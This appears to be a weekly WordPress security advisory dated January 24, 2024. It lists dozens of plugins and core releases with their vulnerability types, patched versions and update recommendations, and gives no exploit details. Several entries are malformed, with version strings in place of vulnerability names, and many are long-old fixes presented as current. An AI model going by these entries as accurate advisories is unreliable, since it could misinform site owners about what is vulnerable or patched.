Watch Out Wednesday – January 24, 2024

Understanding Vulnerabilities in WordPress Plugins

Every week, we highlight known vulnerabilities in WordPress plugins. This information helps you stay informed about potential risks and take appropriate action to protect your website. By addressing these vulnerabilities, you ensure the safety and integrity of your WordPress site and its data.

Plugin: We’re Open!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.38
Recommended Action: Update to version 1.38, or a newer patched version

Plugin: Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported)

Vulnerability: Cross-Site Request Forgery in new_voucher_template.php
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: MOLIE – Instructure Canvas Linking tool

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Socializer – Simple & Easy Social Media Share Icons

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.3
Recommended Action: Update to version 7.3, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authorization Bypass to Private Message Disclosure
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: User Activity Log

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: WidgetShortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: SQL Injection
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.24.4
Recommended Action: Update to version 1.24.4, or a newer patched version

Plugin: Backup Migration

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Live Scores for SportsPress

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Header Footer Code Manager

Vulnerability: Authenticated SQL Injections
Patched Version: 1.1.14
Recommended Action: Update to version 1.1.14, or a newer patched version

Plugin: kk Star Ratings – Rate Post & Collect User Feedbacks

Vulnerability: Race Condition to Multiple User Voting
Patched Version: 5.4.6
Recommended Action: Update to version 5.4.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: AccessPress Social Icons

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Authenticated (Admin+) Remote Code Execution on Multi-Site
Patched Version: 2.80.8
Recommended Action: Update to version 2.80.8, or a newer patched version

Plugin: WP-Contact

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Slider

Vulnerability: Subscriber+ SQL Injection
Patched Version: 1.1.121
Recommended Action: Update to version 1.1.121, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Password Hash Extraction
Patched Version: 0.9.2.5
Recommended Action: Update to version 0.9.2.5, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.9.2
Recommended Action: Update to version 4.9.2, or a newer patched version

Plugin: Edit Comments XT

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking Calendar

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.35
Recommended Action: Update to version 1.3.35, or a newer patched version

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Catch Themes Demo Import

Vulnerability: Arbitrary File Upload
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Titan Framework

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Cross-Linker

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: SearchWP Premium

Vulnerability: Authenticated (Subscriber+) Nonce Leakage and Authorization Bypass
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthorized Profile Modification
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.5
Recommended Action: Update to version 6.0.5, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Cross-Site Scripting via p_name parameter
Patched Version: 1.5.63
Recommended Action: Update to version 1.5.63, or a newer patched version

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Missing Authorization
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Missing Authorization to Product Creation/Modification
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Woocommerce Tabs Plugin, Add Custom Product Tabs

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-ContactForm

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.7.1.1
Recommended Action: Update to version 2.7.1.1, or a newer patched version

Plugin: WF Cookie Consent

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Math Comment Spam Protection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Blaze Slideshow

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.33
Recommended Action: Update to version 1.2.33, or a newer patched version

Plugin: Facebook for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.15
Recommended Action: Update to version 1.9.15, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: BlogVault WordPress Backup Plugin – Migration, Staging, and Backups

Vulnerability: 1.44
Patched Version: 1.45
Recommended Action: Update to version 1.45, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection via WP_Meta_Query
Patched Version: 4.1.34
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Easy Digital Downloads – Simple Shipping

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Sitekit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘sitekit_iframe’ shortcode
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Free counter

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: VK Filter Search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Kali Forms <= 2.3.36
Patched Version: 2.3.37
Recommended Action: Update to version 2.3.37, or a newer patched version

Plugin: Visual Link Preview

Vulnerability: Unauthorised AJAX Calls
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Cross-Site Request Forgery via multiple functions
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: PDQ CSV

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Spreadsheet Integration – Automate Google Sheets With WordPress, WooCommerce & Most Popular Form Plugins. Also, Display Google sheet as a Table.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Subscribe To Comments Reloaded

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 140219
Recommended Action: Update to version 140219, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Local File Inclusion
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Leyka

Vulnerability: Privilege Escalation via Admin Password Reset
Patched Version: 3.30.3
Recommended Action: Update to version 3.30.3, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.5.3.2
Recommended Action: Update to version 1.5.3.2, or a newer patched version

Plugin: Category Post List Widget

Vulnerability: Unauthenticated Stored Cross-Site Scripting via custom_css
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: The Awesome Feed – Custom Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Event Monster – Event Management, Tickets Booking, Upcoming Event

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Smart Slider 3

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.5.1.14
Recommended Action: Update to version 3.5.1.14, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Missing Authorization on Various AJAX Actions
Patched Version: 7.8
Recommended Action: Update to version 7.8, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Arbitrary User Password Reset to Privilege Escalation
Patched Version: 7.5.5
Recommended Action: Update to version 7.5.5, or a newer patched version

Plugin: Bloom Email Opt-In

Vulnerability: Privilege Escalation
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Ideal Interactive Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easing Slider

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.0.7
Recommended Action: Update to version 2.2.0.7, or a newer patched version

Plugin: MemberPress Downloads

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 8.1.1
Recommended Action: Update to version 8.1.1, or a newer patched version

Plugin: JM Twitter Cards

Vulnerability: Full Path Disclosure
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Ruven Toolkit

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: IP Blacklist Cloud

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooDiscuz – WooCommerce Comments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Companion Sitemap Generator – HTML & XML

Vulnerability: Cross-Site Request Forgery and Local File Inclusion
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1.28
Recommended Action: Update to version 3.1.28, or a newer patched version

Plugin: Simple Custom CSS and JS

Vulnerability: Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Missing Authorization via init
Patched Version: 1.3.14
Recommended Action: Update to version 1.3.14, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization to Information Exposure
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: WPForms Pro

Vulnerability: CSV Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Image vertical reel scroll slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Clipr

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Admin Language Change

Vulnerability: Authorization Bypass
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Product Input Fields for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 3.7.25
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.25, 3.8.25, 3.9.23, 4.0.22, 4.1.22, 4.2.19, 4.3.15, 4.4.14, 4.5.13, 4.6.10, 4.7.9, 4.8.5, 4.9.2

Plugin: Safe SVG

Vulnerability: Denial of Service
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Privilege Escalation
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: Indeed Membership Pro

Vulnerability: Remote Image File Inclusion
Patched Version: 7.6
Recommended Action: Update to version 7.6, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Reflected Cross-Site Scripting via ‘ays_pb_tab’ Parameter
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Plaintext Storage of Credentials
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Maspik – Advanced Spam Protection

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.7.9
Recommended Action: Update to version 0.7.9, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 3.2.18
Recommended Action: Update to version 3.2.18, or a newer patched version

Plugin: WpStream – Live Streaming, Video on Demand, Pay Per View

Vulnerability: Cross-Site Request Forgery via wpstream_settings
Patched Version: 4.4.10.6
Recommended Action: Update to version 4.4.10.6, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Content Deletion
Patched Version: 7.6.1
Recommended Action: Update to version 7.6.1, or a newer patched version

Plugin: WordPress Leads

Vulnerability: Authorization Bypass
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: WPAMS – Apartment Management System for wordpress

Vulnerability: Apartment Management System for wordpress Theme < 17-07-2019
Patched Version: 17-07-2019
Recommended Action: Update to version 17-07-2019, or a newer patched version

Plugin: Car Rental by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: SQL Injection
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: BJ Lazy Load

Vulnerability: Remote File Inclusion via TimThumb
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: YouSayToo auto-publishing plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Builder by Themify

Vulnerability: Email Injection
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: WP phpMyAdmin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.0.4
Recommended Action: Update to version 5.2.0.4, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Contact Form 7 <= 1.3.3.2
Patched Version: 1.3.3.3
Recommended Action: Update to version 1.3.3.3, or a newer patched version

Plugin: Bubble Menu – Sticky Navigation with Floating Button Menu Solution

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Core: WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 3.7.39
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.39, 3.8.39, 3.9.37, 4.0.36, 4.1.36, 4.2.33, 4.3.29, 4.4.28, 4.5.27, 4.6.24, 4.7.24, 4.8.20, 4.9.21, 5.0.17, 5.1.14, 5.2.16, 5.3.13, 5.4.11, 5.5.10, 5.6.9, 5.7.7, 5.8.5, 5.9.4, 6.0.2

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_preload_single_save_settings_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP Reset – Most Advanced WordPress Reset Tool

Vulnerability: Authenticated Stored Cross-Site Scripting via extra_data Parameter
Patched Version: 1.90
Recommended Action: Update to version 1.90, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Plugin: WP Booklet

Vulnerability: Authenticated (Subscriber+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rate Star Review Vote – AJAX Reviews, Votes, Star Ratings

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: TS Webfonts for さくらのレンタルサーバ

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.5
Recommended Action: Update to version 5.5.5, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.10.0.130
Recommended Action: Update to version 2.10.0.130, or a newer patched version

Plugin: Gallery – Video Gallery and YouTube Gallery

Vulnerability: Video Gallery and YouTube Gallery <= 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Comment Uploaded Image Filename
Patched Version: 7.6.12
Recommended Action: Update to version 7.6.12, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Server-Side Request Forgery
Patched Version: 8.7.4
Recommended Action: Update to version 8.7.4, or a newer patched version

Plugin: ChatBot Conversational Forms

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Free Booking Plugin for Hotels, Restaurants and Car Rentals – eaSYNC Booking

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: Improper Access Control
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Subscriber+ Arbitrary File Creation/Upload/Deletion
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: MyBookTable Bookstore by Stormhill Media

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: WPMobile.App — Android and iOS Mobile Application

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 11.21
Recommended Action: Update to version 11.21, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: PHP Object Injection
Patched Version: 6.9.4
Recommended Action: Update to version 6.9.4, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Unauthenticated PHP Object Injection in prepare_unread_status
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Easy Contact Form Solution

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Property Hive

Vulnerability: Remote Code Execution
Patched Version: 1.4.26
Recommended Action: Update to version 1.4.26, or a newer patched version

Plugin: Updraft

Vulnerability: Reflected Cross-Site Scripting via ‘backup_timestamp’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: YouTube Playlist Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.6.8
Recommended Action: Update to version 4.6.8, or a newer patched version

Plugin: WooCommerce Easy Duplicate Product

Vulnerability: Missing Authorization via wedp_duplicate_product_action
Patched Version: 0.3.0.8
Recommended Action: Update to version 0.3.0.8, or a newer patched version

Plugin: Filr – Secure document library

Vulnerability: Missing Authorization
Patched Version: 1.2.2.1
Recommended Action: Update to version 1.2.2.1, or a newer patched version

Plugin: KP Fastest Tawk.to Chat

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AS – Create Pinterest Pinboard Pages

Vulnerability: Authenticated Options Change to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Grid Portfolio – Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: PhotoXhibit

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.4.6
Recommended Action: Update to version 4.4.6, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_bulk_activate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: WP Admin UI Customize

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 1.5.13
Recommended Action: Update to version 1.5.13, or a newer patched version

Plugin: WP Google Fonts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: ElasticPress

Vulnerability: Directory Traversal
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Sensei LMS – Online Courses, Quizzes, & Learning

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.18.0
Recommended Action: Update to version 4.18.0, or a newer patched version

Plugin: OpenInviter for WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery via wp_ajax_powerpress_media_info
Patched Version: 11.0.7
Recommended Action: Update to version 11.0.7, or a newer patched version

Plugin: WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: WP GDPR

Vulnerability: Missing Authorization Checks
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Time Slots Booking Form

Vulnerability: Cross-Site Request Forgery to Feedback Submission
Patched Version: 1.1.77
Recommended Action: Update to version 1.1.77, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 8.9.6
Recommended Action: Update to version 8.9.6, or a newer patched version

Plugin: Credova Financial

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

